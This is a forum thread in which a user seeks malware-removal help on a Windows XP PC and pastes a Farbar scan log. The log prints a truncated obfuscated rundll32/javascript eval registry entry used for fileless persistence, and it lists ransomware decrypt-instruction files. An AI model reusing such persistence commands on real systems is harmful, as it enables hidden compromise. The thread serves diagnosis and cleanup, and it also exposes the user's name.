Jump to content
KVT

Avenger.txt reloads and grows in size after each startup recommended by MAM so as to rid of captured malware

Recommended Posts

Dear TWE,

I am writing to you from a friends computer as mine froze /hung when the internet connection was lost (something you alluded to) during the process of combo fix, scanning the computer. (after it downloaded or updated a MS recovery console) which had not found during the process. When the hung up occurred (before internet connection was lost) i pressed on the link of your message (if you loose internet connection) of yesterday; a new browsing window opened and that is when i got the 'unable to connect to the internet' message and everything froze. So what to do now? i am VERY afraid that if i need to force a computer restart that the Avenger file will come and install a huge text file and choke my computerbefre i have the chance to have combofix work. Advise? thanks.    

Share this post


Link to post
Share on other sites

I will, but so worried of the outcome. I have read now the link from your instruction on how to deal with the lost internet connection (expected) and i can go change the network settings to address that if there is no connection when i reboot but that is the least of my worries; i worry that the Avenger will take over; lets see. I will report soon. thanks.   

Share this post


Link to post
Share on other sites

As predicted and worse, the Avenger has created havoc after rebooting. I tried to delete the Avenger text file before it would spread, but then i got a note that it cannot be deleted as it is used by another program (yet nothing was open). So i run the combofix which worked and then looked to find its log file in the folders in C drive.Then i realised that in front of my eyes a new folder with long letters,numbers was created and underneath it most of my C drive files were duplicated,multiplied and i could see the same happening in other folders below. The hard drive was getting minimised in space, and it was impossible to work and open a browser to send you the log file...which i still do not know where is. I also found another strange name file called qualcom or something which seemed to have files from scans. \i wish through a team viewer you could look into the pc. I have turned it off of course to avoid it being crushed. what do you suggest now? can i open in safe mode and work around to find the log file? but then how will i send it to you? i wish combofix had not stalled earlier; i knew that my restarting this would happen :(   

Share this post


Link to post
Share on other sites

Ok, i turned the PC in safe mode (btw can i use the internet in safe mode?) and i can look into the folders w/out having the folders multiply over and in size. I am trying to find the combofix log file to copy it via a USB drive and send it to you from this pc but i cant find it. It is not on the desktop and i cannot find it in C drive. Where can i find t? 

 

if it is not there, can i run combofix again from safe mode? 

 

The extra new files in my C drive are all under a new master file which has the same 'my computer' icon, yet it is named '32788R22FWJFW'. it contains:

1. The Local disk C

2. The CD drive D

3. The control panel

4. Shared documents

5. MY name documents 

 

Basically all these are copied - recreated folders of the original C drive and i am tempted to delete them. ?

 

The remaining files under the original C drive are:

 

1. a file named 13aeb57dd9c3dd4707bfd7cf which was created or placed there a week ago when i first got infected. Under it has two subfiles named: a) amd64 and b) i386. The y do not seem infected files and that is why i did not delete them earlier; fearing that they may be system files. They contain files with extensions  .dll .cat .gpd .ppd 

 

2. Documents and settings 

3. FRST (the farbar folder)

4. Program files 

5. Quobox (it has several quarantined and  files including registry back up files 

6. Windows 

 

 

  

Share this post


Link to post
Share on other sites

About your first question, about master file, don't worry, these are created by ComboFix. We will delete them after we clean your system.

 

Second question, open Qoobox folder, and see if ComboFix.txt report is located there.

Share this post


Link to post
Share on other sites

Ok, now that i received this post of yours i know where to find the combofix logfile under the Quobox folder. 

It has 5 folders, yet several of them are empty which tells me that probably the scan did not run all the way (possibly).

These are:

- Backenv

-Lastrun

-Quarantine ( which has a C subfolder and a Registry_backups subfolder) and it also has a catchme.log file Is it the one?

- Test 

- TestC 

Share this post


Link to post
Share on other sites

no i cnt find the text file under Quobox folder. i can only find .dat files under the 'backEnv' folder. Can i run the combofix again from safe mode? 

 

Another question: all my files are now on the external drive which an IT literate source is awaiting my permission to run a rootkit (possibly a MB rootkit). Is it safe to do? or better from them to download and run farbar or combofix? The scans using MS security essentials and MB did not find an infection.  

Share this post


Link to post
Share on other sites

i am on the auto scan stage now that says that takes 10-20 mins but it has already taken that time. the cursor is there waiting to show the infected files 

Share this post


Link to post
Share on other sites

sorry i did not see this and i had combofix running. i will await a bit more and if it does not progress i will run the farbar as you have asked.

Share this post


Link to post
Share on other sites

your request ref farbar was it for the laptoo or for the external drive?

Share this post


Link to post
Share on other sites

i have  a feeling you have left for the  day; the combofix scan was stalled and i could not do anything, so i reboot and try farbar from safe mode. 

Share this post


Link to post
Share on other sites

even at safemode, very difficult to perform tasks; i run the farbar;the text files were crested. Put a usb into the machine and tried to open the text files (as on right click there is no option to copy them, only to send them somewhere). \automatically the were opened with Word (HOW can i change this so they are opened as text files|?) and when i tried to save them in the usb the word program was crushing and then i saw a notice that windows were uninstalled. is that the result of the virus commanding this to hsppen|/ i am so dissolutioned and exhausted; all i do is try to fix this issue with you.Help pls

Share this post


Link to post
Share on other sites

'send to'is not really send; is copy to. i rebooted on safe mode and have copied the text files from farbar scasn on a usb; but how do i attach here? no attach function that i can see. 

Share this post


Link to post
Share on other sites

the computer i work from now does not have office loaded, so i cant open these text files and copy them as text here; so pls show me how to attach them. I find a challenge in every step! i m drained! HELP pls. 

Share this post


Link to post
Share on other sites

Ok,this computer has Notepad, so i opened from note pad and i copy here the First.text (scan). I will post the addittion.txt on next post

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:5-08-2014
Ran by Konstantine Trivizas (administrator) on KONSTANT-8F5437 on 07-08-2014 17:19:29
Running from C:\Documents and Settings\Konstantine Trivizas\Desktop
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Safe Mode (minimal)
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [519584 2010-12-21] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
URLSearchHook: HKCU - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Ad-Aware Security Toolbar -> {6c97a91e-4524-4019-86af-2aa2d567bf5c} -> C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [304128 2009-05-24] (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0
Tcpip\..\Interfaces\{44C2C7EA-F701-4F67-880D-ECFE2FE5B7BA}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{6A0C5F9A-BF17-46DE-9AC9-35267BF55774}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{96E2D96F-12B6-4E49-9218-35E42F97A477}: [NameServer]8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @Skype Technologies S.A..com/Skype Web Plugin -> C:\Program Files\SkypeWebPlugin\npSkypeWebPlugin.dll (Skype)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-08-22]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-02]
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.co.uk/
CHR StartupUrls: "https://www.google.co.uk/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (RealNetworks RealDownloader Chrome Background Extension Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader PepperFlashVideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealDownloader Plugin) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
CHR Plugin: (Citrix Online Web Deployment Plugin 1.0.0.104) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.13) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Presentation Foundation) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Download Plugin) - c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (AdBlock) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-07-24]
CHR Extension: (Pin It Button) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2013-05-24]
CHR Extension: (Lavasoft SecureSearch) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jjjgoniibiigbcfeipbhfcconfgmgmkc [2014-08-05]
CHR Extension: (Save to Pocket) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\niloccemoadcdkdjlinkgdfekeahmflj [2013-10-23]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-28]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\DOCUME~1\KONSTA~1\LOCALS~1\APPLIC~1\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2012-11-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BAsfIpM; C:\WINDOWS\system32\basfipm.exe [77824 2003-02-06] (Broadcom Corp.) [File not signed]
S2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-03-17] (Oracle Corporation)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [655352 2014-06-03] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [11552 2012-03-26] (Microsoft Corporation)
S2 PEVSystemStart; C:\ComboFix\SWREG.3XE [518144 2000-08-31] (SteelWerX) [File not signed]
S2 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [1200128 2005-12-19] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BASFND; C:\WINDOWS\system32\Drivers\BASFND.sys [6057 2002-03-13] (Broadcom Corporation) [File not signed]
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [424448 2006-12-18] (Broadcom Corporation)
S3 GTICARD; C:\WINDOWS\System32\DRIVERS\gticard.sys [59328 2003-02-06] (Texas Instruments)
S3 HSFHWICH; C:\WINDOWS\System32\DRIVERS\HSFHWICH.sys [208384 2005-05-03] (Conexant Systems, Inc.)
S3 HSF_DPV; C:\WINDOWS\System32\DRIVERS\HSF_DPV.SYS [1033728 2005-05-03] (Conexant Systems, Inc.)
S0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [171064 2012-03-20] (Microsoft Corporation)
S3 STAC97; C:\WINDOWS\System32\drivers\STAC97.sys [264440 2004-11-15] (SigmaTel, Inc.)
R3 tiumfwl; C:\WINDOWS\System32\drivers\tiumfwl.sys [42060 2003-02-14] (Texas Instruments Inc.)
S3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [360376 2014-04-22] (BitDefender S.R.L.)
S3 vrvd5; C:\WINDOWS\System32\DRIVERS\vrvd5.sys [11296 2014-06-16] (Rsupport Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 16:23 - 2014-08-07 16:26 - 00000000 ___SD () C:\ComboFix
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:08 - 2011-06-26 07:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-07 12:08 - 2010-11-07 18:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-07 12:08 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-07 11:41 - 2014-08-07 11:42 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:31 - 2014-08-06 16:32 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:26 - 2014-08-07 17:20 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-06 14:37 - 2014-08-06 14:38 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-06 13:51 - 2014-08-07 17:19 - 00000000 ____D () C:\FRST
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-07 14:31 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:35 - 2014-08-07 14:31 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-05 15:35 - 2014-08-05 17:15 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:33 - 2014-08-05 15:34 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:02 - 2014-08-05 15:38 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 13:40 - 2014-08-05 13:41 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:34 - 2014-08-05 13:36 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:32 - 2014-08-05 13:41 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:39 - 2014-08-05 15:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-04 17:11 - 2014-08-06 16:24 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-05 18:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:10 - 2014-05-12 07:26 - 00053208 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-08-04 17:10 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-08-04 17:04 - 2014-08-07 17:11 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-04 17:04 - 2014-08-07 14:48 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-04 17:04 - 2014-08-07 14:21 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 16:59 - 2014-08-04 17:00 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-07 17:11 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 17:02 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 16:54 - 2014-08-04 16:56 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
